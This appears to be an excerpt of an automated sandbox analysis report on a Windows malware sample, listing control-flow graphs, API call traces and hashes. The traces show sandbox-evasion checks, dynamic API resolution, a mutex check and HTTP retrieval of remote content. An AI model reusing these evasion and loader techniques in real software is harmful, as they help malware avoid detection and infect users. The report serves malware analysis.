1011d46-1011d54 lstrcpy lstrcat 1847->1850 1854 1011d9a-1011db4 lstrlen call ff2930 1848->1854 1855 1011d7d-1011d7f 1848->1855 1850->1848 1860 1011db6-1011db8 1854->1860 1861 1011dce-1011deb call 1012a40 lstrlen call ff2930 1854->1861 1855->1854 1856 1011d81-1011d85 1855->1856 1856->1854 1858 1011d87-1011d94 lstrcpy lstrcat 1856->1858 1858->1854 1860->1861 1862 1011dba-1011dc8 lstrcpy lstrcat 1860->1862 1867 1011e0a-1011e0f 1861->1867 1868 1011ded-1011def 1861->1868 1862->1861 1870 1011e11 call ff2a20 1867->1870 1871 1011e16-1011e22 call ff2930 1867->1871 1868->1867 1869 1011df1-1011df5 1868->1869 1869->1867 1872 1011df7-1011e04 lstrcpy lstrcat 1869->1872 1870->1871 1876 1011e30-1011e66 call ff2a20 * 5 OpenEventA 1871->1876 1877 1011e24-1011e26 1871->1877 1872->1867 1889 1011e68-1011e8a CloseHandle Sleep OpenEventA 1876->1889 1890 1011e8c-1011ea0 CreateEventA call 1011b20 call 100ffd0 1876->1890 1877->1876 1878 1011e28-1011e2a lstrcpy 1877->1878 1878->1876 1889->1889 1889->1890 1894 1011ea5-1011eae CloseHandle ExitProcess 1890->1894
                                APIs
                                  • Part of subcall function 01016390: GetProcAddress.KERNEL32(77190000,00D616C0), ref: 010163E9
                                  • Part of subcall function 01016390: GetProcAddress.KERNEL32(77190000,00D616F0), ref: 01016402
                                  • Part of subcall function 01016390: GetProcAddress.KERNEL32(77190000,00D61480), ref: 0101641A
                                  • Part of subcall function 01016390: GetProcAddress.KERNEL32(77190000,00D61498), ref: 01016432
                                  • Part of subcall function 01016390: GetProcAddress.KERNEL32(77190000,00D68B80), ref: 0101644B
                                  • Part of subcall function 01016390: GetProcAddress.KERNEL32(77190000,00D56118), ref: 01016463
                                  • Part of subcall function 01016390: GetProcAddress.KERNEL32(77190000,00D56218), ref: 0101647B
                                  • Part of subcall function 01016390: GetProcAddress.KERNEL32(77190000,00D614B0), ref: 01016494
                                  • Part of subcall function 01016390: GetProcAddress.KERNEL32(77190000,00D614F8), ref: 010164AC
                                  • Part of subcall function 01016390: GetProcAddress.KERNEL32(77190000,00D61510), ref: 010164C4
                                  • Part of subcall function 01016390: GetProcAddress.KERNEL32(77190000,00D61528), ref: 010164DD
                                  • Part of subcall function 01016390: GetProcAddress.KERNEL32(77190000,00D56138), ref: 010164F5
                                  • Part of subcall function 01016390: GetProcAddress.KERNEL32(77190000,00D61540), ref: 0101650D
                                • lstrcpy.KERNEL32(00000000,0101CFEC), ref: 01011C2F
                                • ExitProcess.KERNEL32 ref: 01011C67
                                • GetSystemInfo.KERNEL32(?), ref: 01011C71
                                • ExitProcess.KERNEL32 ref: 01011C7F
                                  • Part of subcall function 00FF1030: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00FF1046
                                  • Part of subcall function 00FF1030: VirtualAllocExNuma.KERNEL32(00000000), ref: 00FF104D
                                  • Part of subcall function 00FF1030: ExitProcess.KERNEL32 ref: 00FF1058
                                  • Part of subcall function 00FF10C0: GlobalMemoryStatusEx.KERNEL32 ref: 00FF10EA
                                  • Part of subcall function 00FF10C0: ExitProcess.KERNEL32 ref: 00FF1114
                                • GetUserDefaultLangID.KERNEL32 ref: 01011C8F
                                • ExitProcess.KERNEL32 ref: 01011CB2
                                • ExitProcess.KERNEL32 ref: 01011CE1
                                • lstrlen.KERNEL32(00D68B50), ref: 01011CEE
                                • lstrcpy.KERNEL32(00000000,?), ref: 01011D15
                                • lstrcat.KERNEL32(00000000,00D68B50), ref: 01011D1D
                                • lstrlen.KERNEL32(01024B98), ref: 01011D28
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01011D48
                                • lstrcat.KERNEL32(00000000,01024B98), ref: 01011D54
                                • lstrlen.KERNEL32(00000000), ref: 01011D63
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01011D89
                                • lstrcat.KERNEL32(00000000,00000000), ref: 01011D94
                                • lstrlen.KERNEL32(01024B98), ref: 01011D9F
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01011DBC
                                • lstrcat.KERNEL32(00000000,01024B98), ref: 01011DC8
                                • lstrlen.KERNEL32(00000000), ref: 01011DD7
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01011DF9
                                • lstrcat.KERNEL32(00000000,00000000), ref: 01011E04
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProc$Process$Exitlstrcpy$lstrcatlstrlen$AllocCurrentDefaultGlobalInfoLangMemoryNumaStatusSystemUserVirtual
                                • String ID:
                                • API String ID: 3366406952-0
                                • Opcode ID: 0bcc9415a094a75fa78311b5640aebe13fda190975b16cce9283b5a5381a4c49
                                • Instruction ID: 4fae4492812beecc735f849e20f5b947d9d9e861b194d4c36100edf208ee0922
                                • Opcode Fuzzy Hash: 0bcc9415a094a75fa78311b5640aebe13fda190975b16cce9283b5a5381a4c49
                                • Instruction Fuzzy Hash: 70719F3150022AABEB71BFB4EC8DB6E3BF9AF04705F441058F74696199DB7CD9019B60

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1895 ff6c40-ff6c64 call ff2930 1898 ff6c66-ff6c6b 1895->1898 1899 ff6c75-ff6c97 call ff4bc0 1895->1899 1898->1899 1900 ff6c6d-ff6c6f lstrcpy 1898->1900 1903 ff6caa-ff6cba call ff2930 1899->1903 1904 ff6c99 1899->1904 1900->1899 1908 ff6cbc-ff6cc2 lstrcpy 1903->1908 1909 ff6cc8-ff6cf5 InternetOpenA StrCmpCA 1903->1909 1906 ff6ca0-ff6ca8 1904->1906 1906->1903 1906->1906 1908->1909 1910 ff6cfa-ff6cfc 1909->1910 1911 ff6cf7 1909->1911 1912 ff6ea8-ff6ebb call ff2930 1910->1912 1913 ff6d02-ff6d22 InternetConnectA 1910->1913 1911->1910 1922 ff6ebd-ff6ebf 1912->1922 1923 ff6ec9-ff6ee0 call ff2a20 * 2 1912->1923 1914 ff6d28-ff6d5d HttpOpenRequestA 1913->1914 1915 ff6ea1-ff6ea2 InternetCloseHandle 1913->1915 1917 ff6e94-ff6e9e InternetCloseHandle 1914->1917 1918 ff6d63-ff6d65 1914->1918 1915->1912 1917->1915 1920 ff6d7d-ff6dad HttpSendRequestA HttpQueryInfoA 1918->1920 1921 ff6d67-ff6d77 InternetSetOptionA 1918->1921 1924 ff6daf-ff6dd3 call 10171e0 call ff2a20 * 2 1920->1924 1925 ff6dd4-ff6de4 call 1013d90 1920->1925 1921->1920 1922->1923 1926 ff6ec1-ff6ec3 lstrcpy 1922->1926 1925->1924 1935 ff6de6-ff6de8 1925->1935 1926->1923 1937 ff6dee-ff6e07 InternetReadFile 1935->1937 1938 ff6e8d-ff6e8e InternetCloseHandle 1935->1938 1937->1938 1941 ff6e0d 1937->1941 1938->1917 1943 ff6e10-ff6e15 1941->1943 1943->1938 1944 ff6e17-ff6e3d call 1017310 1943->1944 1947 ff6e3f call ff2a20 1944->1947 1948 ff6e44-ff6e51 call ff2930 1944->1948 1947->1948 1952 ff6e53-ff6e57 1948->1952 1953 ff6e61-ff6e8b call ff2a20 InternetReadFile 1948->1953 1952->1953 1954 ff6e59-ff6e5b lstrcpy 1952->1954 1953->1938 1953->1943 1954->1953
                                APIs
                                • lstrcpy.KERNEL32(00000000,?), ref: 00FF6C6F
                                • lstrcpy.KERNEL32(00000000,0101CFEC), ref: 00FF6CC2
                                • InternetOpenA.WININET(0101CFEC,00000001,00000000,00000000,00000000), ref: 00FF6CD5
                                • StrCmpCA.SHLWAPI(?,00D6F3C8), ref: 00FF6CED
                                • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00FF6D15
                                • HttpOpenRequestA.WININET(00000000,GET,?,00D6EEC8,00000000,00000000,-00400100,00000000), ref: 00FF6D50
                                • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00FF6D77
                                • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00FF6D86
                                • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00FF6DA5
                                • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00FF6DFF
                                • lstrcpy.KERNEL32(00000000,?), ref: 00FF6E5B
                                • InternetReadFile.WININET(?,00000000,000007CF,?), ref: 00FF6E7D
                                • InternetCloseHandle.WININET(00000000), ref: 00FF6E8E
                                • InternetCloseHandle.WININET(?), ref: 00FF6E98
                                • InternetCloseHandle.WININET(00000000), ref: 00FF6EA2
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FF6EC3
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internet$lstrcpy$CloseHandleHttp$FileOpenReadRequest$ConnectInfoOptionQuerySend
                                • String ID: ERROR$GET
                                • API String ID: 3687753495-3591763792
                                • Opcode ID: e7b3452769d4df0865488ff3b3ab132dc8b0f17dbe81711ccd63ba7b5c584b3e
                                • Instruction ID: f3e46d242e50ef62a5e21c691b15d69ccbdc311e91abe15d042d5c0cf00617f0
                                • Opcode Fuzzy Hash: e7b3452769d4df0865488ff3b3ab132dc8b0f17dbe81711ccd63ba7b5c584b3e
                                • Instruction Fuzzy Hash: A8819E72E00219ABEB30DFA4DC49FAE77B8AF44710F104168FA45EB294DB74AD449B94

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 2511 ff4a60-ff4afc RtlAllocateHeap 2528 ff4afe-ff4b03 2511->2528 2529 ff4b7a-ff4bbe VirtualProtect 2511->2529 2530 ff4b06-ff4b78 2528->2530 2530->2529
                                APIs
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00FF4AA3
                                • VirtualProtect.KERNEL32(00000000,00000004,00000100,?), ref: 00FF4BB0
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: AllocateHeapProtectVirtual
                                • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                                • API String ID: 1542196881-3329630956
                                • Opcode ID: f39ab811fa60390dc1cac8ec6a0f8469ce02318833a098ce102de47401af814a
                                • Instruction ID: 87acecfb84a158071bb1c70fc53ee24d603ebe90b2905afd89e73c168c6c1115
                                • Opcode Fuzzy Hash: f39ab811fa60390dc1cac8ec6a0f8469ce02318833a098ce102de47401af814a
                                • Instruction Fuzzy Hash: 7231C929F8023D769620EBFF4C4BF5F6E55EFC5AA0B02405BF588DF201D9A25501CAE2
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 01012A6F
                                • RtlAllocateHeap.NTDLL(00000000), ref: 01012A76
                                • GetUserNameA.ADVAPI32(00000000,00000104), ref: 01012A8A
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateNameProcessUser
                                • String ID:
                                • API String ID: 1296208442-0
                                • Opcode ID: a8601397ca410d3773d7ed52471bce929b12727d04be9234cae781b2db0343ab
                                • Instruction ID: 04a357a9006a7156641a954bc67625efd355d8efc4413a4f883aa9b780cf4418
                                • Opcode Fuzzy Hash: a8601397ca410d3773d7ed52471bce929b12727d04be9234cae781b2db0343ab
                                • Instruction Fuzzy Hash: 78F0BB71A40258BFC720DF88DD49F9EB7BCF704B21F000116F915D3680D778190487A1

                                Control-flow Graph

                                APIs
                                • GetProcAddress.KERNEL32(77190000,00D56318), ref: 010166F5
                                • GetProcAddress.KERNEL32(77190000,00D563F8), ref: 0101670D
                                • GetProcAddress.KERNEL32(77190000,00D68F60), ref: 01016726
                                • GetProcAddress.KERNEL32(77190000,00D68F18), ref: 0101673E
                                • GetProcAddress.KERNEL32(77190000,00D68F90), ref: 01016756
                                • GetProcAddress.KERNEL32(77190000,00D6D710), ref: 0101676F
                                • GetProcAddress.KERNEL32(77190000,00D5A190), ref: 01016787
                                • GetProcAddress.KERNEL32(77190000,00D6D530), ref: 0101679F
                                • GetProcAddress.KERNEL32(77190000,00D6D428), ref: 010167B8
                                • GetProcAddress.KERNEL32(77190000,00D6D440), ref: 010167D0
                                • GetProcAddress.KERNEL32(77190000,00D6D6C8), ref: 010167E8
                                • GetProcAddress.KERNEL32(77190000,00D56338), ref: 01016801
                                • GetProcAddress.KERNEL32(77190000,00D56238), ref: 01016819
                                • GetProcAddress.KERNEL32(77190000,00D56378), ref: 01016831
                                • GetProcAddress.KERNEL32(77190000,00D56038), ref: 0101684A
                                • GetProcAddress.KERNEL32(77190000,00D6D650), ref: 01016862
                                • GetProcAddress.KERNEL32(77190000,00D6D518), ref: 0101687A
                                • GetProcAddress.KERNEL32(77190000,00D5A078), ref: 01016893
                                • GetProcAddress.KERNEL32(77190000,00D561D8), ref: 010168AB
                                • GetProcAddress.KERNEL32(77190000,00D6D6E0), ref: 010168C3
                                • GetProcAddress.KERNEL32(77190000,00D6D4B8), ref: 010168DC
                                • GetProcAddress.KERNEL32(77190000,00D6D698), ref: 010168F4
                                • GetProcAddress.KERNEL32(77190000,00D6D578), ref: 0101690C
                                • GetProcAddress.KERNEL32(77190000,00D561F8), ref: 01016925
                                • GetProcAddress.KERNEL32(77190000,00D6D458), ref: 0101693D
                                • GetProcAddress.KERNEL32(77190000,00D6D638), ref: 01016955
                                • GetProcAddress.KERNEL32(77190000,00D6D620), ref: 0101696E
                                • GetProcAddress.KERNEL32(77190000,00D6D4D0), ref: 01016986
                                • GetProcAddress.KERNEL32(77190000,00D6D6F8), ref: 0101699E
                                • GetProcAddress.KERNEL32(77190000,00D6D668), ref: 010169B7
                                • GetProcAddress.KERNEL32(77190000,00D6D4E8), ref: 010169CF
                                • GetProcAddress.KERNEL32(77190000,00D6D560), ref: 010169E7
                                • GetProcAddress.KERNEL32(77190000,00D6D470), ref: 01016A00
                                • GetProcAddress.KERNEL32(77190000,00D5F730), ref: 01016A18
                                • GetProcAddress.KERNEL32(77190000,00D6D680), ref: 01016A30
                                • GetProcAddress.KERNEL32(77190000,00D6D500), ref: 01016A49
                                • GetProcAddress.KERNEL32(77190000,00D56058), ref: 01016A61
                                • GetProcAddress.KERNEL32(77190000,00D6D6B0), ref: 01016A79
                                • GetProcAddress.KERNEL32(77190000,00D56078), ref: 01016A92
                                • GetProcAddress.KERNEL32(77190000,00D6D548), ref: 01016AAA
                                • GetProcAddress.KERNEL32(77190000,00D6D488), ref: 01016AC2
                                • GetProcAddress.KERNEL32(77190000,00D56098), ref: 01016ADB
                                • GetProcAddress.KERNEL32(77190000,00D560F8), ref: 01016AF3
                                • LoadLibraryA.KERNEL32(00D6D4A0,0101051F), ref: 01016B05
                                • LoadLibraryA.KERNEL32(00D6D5D8), ref: 01016B16
                                • LoadLibraryA.KERNEL32(00D6D5F0), ref: 01016B28
                                • LoadLibraryA.KERNEL32(00D6D5A8), ref: 01016B3A
                                • LoadLibraryA.KERNEL32(00D6D608), ref: 01016B4B
                                • LoadLibraryA.KERNEL32(00D6D590), ref: 01016B5D
                                • LoadLibraryA.KERNEL32(00D6D5C0), ref: 01016B6F
                                • LoadLibraryA.KERNEL32(00D6D818), ref: 01016B80
                                • GetProcAddress.KERNEL32(77040000,00D56158), ref: 01016B9C
                                • GetProcAddress.KERNEL32(77040000,00D6D8C0), ref: 01016BB4
                                • GetProcAddress.KERNEL32(77040000,00D68AE0), ref: 01016BCD
                                • GetProcAddress.KERNEL32(77040000,00D6D890), ref: 01016BE5
                                • GetProcAddress.KERNEL32(77040000,00D56198), ref: 01016BFD
                                • GetProcAddress.KERNEL32(73DB0000,00D5A000), ref: 01016C1D
                                • GetProcAddress.KERNEL32(73DB0000,00D56678), ref: 01016C35
                                • GetProcAddress.KERNEL32(73DB0000,00D5A2D0), ref: 01016C4E
                                • GetProcAddress.KERNEL32(73DB0000,00D6D740), ref: 01016C66
                                • GetProcAddress.KERNEL32(73DB0000,00D6D800), ref: 01016C7E
                                • GetProcAddress.KERNEL32(73DB0000,00D56758), ref: 01016C97
                                • GetProcAddress.KERNEL32(73DB0000,00D567B8), ref: 01016CAF
                                • GetProcAddress.KERNEL32(73DB0000,00D6D758), ref: 01016CC7
                                • GetProcAddress.KERNEL32(768D0000,00D564F8), ref: 01016CE3
                                • GetProcAddress.KERNEL32(768D0000,00D56698), ref: 01016CFB
                                • GetProcAddress.KERNEL32(768D0000,00D6D848), ref: 01016D14
                                • GetProcAddress.KERNEL32(768D0000,00D6D7D0), ref: 01016D2C
                                • GetProcAddress.KERNEL32(768D0000,00D56798), ref: 01016D44
                                • GetProcAddress.KERNEL32(75790000,00D5A1E0), ref: 01016D64
                                • GetProcAddress.KERNEL32(75790000,00D5A348), ref: 01016D7C
                                • GetProcAddress.KERNEL32(75790000,00D6D830), ref: 01016D95
                                • GetProcAddress.KERNEL32(75790000,00D56658), ref: 01016DAD
                                • GetProcAddress.KERNEL32(75790000,00D565F8), ref: 01016DC5
                                • GetProcAddress.KERNEL32(75790000,00D5A398), ref: 01016DDE
                                • GetProcAddress.KERNEL32(75A10000,00D6D8A8), ref: 01016DFE
                                • GetProcAddress.KERNEL32(75A10000,00D56718), ref: 01016E16
                                • GetProcAddress.KERNEL32(75A10000,00D68B40), ref: 01016E2F
                                • GetProcAddress.KERNEL32(75A10000,00D6D7A0), ref: 01016E47
                                • GetProcAddress.KERNEL32(75A10000,00D6D770), ref: 01016E5F
                                • GetProcAddress.KERNEL32(75A10000,00D56778), ref: 01016E78
                                • GetProcAddress.KERNEL32(75A10000,00D56558), ref: 01016E90
                                • GetProcAddress.KERNEL32(75A10000,00D6D788), ref: 01016EA8
                                • GetProcAddress.KERNEL32(75A10000,00D6D860), ref: 01016EC1
                                • GetProcAddress.KERNEL32(75A10000,CreateDesktopA), ref: 01016ED7
                                • GetProcAddress.KERNEL32(75A10000,OpenDesktopA), ref: 01016EEE
                                • GetProcAddress.KERNEL32(75A10000,CloseDesktop), ref: 01016F05
                                • GetProcAddress.KERNEL32(76850000,00D564D8), ref: 01016F21
                                • GetProcAddress.KERNEL32(76850000,00D6D8D8), ref: 01016F39
                                • GetProcAddress.KERNEL32(76850000,00D6D878), ref: 01016F52
                                • GetProcAddress.KERNEL32(76850000,00D6D7B8), ref: 01016F6A
                                • GetProcAddress.KERNEL32(76850000,00D6D728), ref: 01016F82
                                • GetProcAddress.KERNEL32(75690000,00D56418), ref: 01016F9E
                                • GetProcAddress.KERNEL32(75690000,00D56438), ref: 01016FB6
                                • GetProcAddress.KERNEL32(769C0000,00D566B8), ref: 01016FD2
                                • GetProcAddress.KERNEL32(769C0000,00D6D7E8), ref: 01016FEA
                                • GetProcAddress.KERNEL32(6F8C0000,00D565D8), ref: 0101700A
                                • GetProcAddress.KERNEL32(6F8C0000,00D56478), ref: 01017022
                                • GetProcAddress.KERNEL32(6F8C0000,00D56618), ref: 0101703B
                                • GetProcAddress.KERNEL32(6F8C0000,00D6D1A0), ref: 01017053
                                • GetProcAddress.KERNEL32(6F8C0000,00D56458), ref: 0101706B
                                • GetProcAddress.KERNEL32(6F8C0000,00D56498), ref: 01017084
                                • GetProcAddress.KERNEL32(6F8C0000,00D564B8), ref: 0101709C
                                • GetProcAddress.KERNEL32(6F8C0000,00D566D8), ref: 010170B4
                                • GetProcAddress.KERNEL32(6F8C0000,InternetSetOptionA), ref: 010170CB
                                • GetProcAddress.KERNEL32(6F8C0000,HttpQueryInfoA), ref: 010170E2
                                • GetProcAddress.KERNEL32(75D90000,00D6D260), ref: 010170FE
                                • GetProcAddress.KERNEL32(75D90000,00D68AB0), ref: 01017116
                                • GetProcAddress.KERNEL32(75D90000,00D6D290), ref: 0101712F
                                • GetProcAddress.KERNEL32(75D90000,00D6D2A8), ref: 01017147
                                • GetProcAddress.KERNEL32(76470000,00D56518), ref: 01017163
                                • GetProcAddress.KERNEL32(6D760000,00D6D128), ref: 0101717F
                                • GetProcAddress.KERNEL32(6D760000,00D56578), ref: 01017197
                                • GetProcAddress.KERNEL32(6D760000,00D6D2D8), ref: 010171B0
                                • GetProcAddress.KERNEL32(6D760000,00D6D188), ref: 010171C8
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
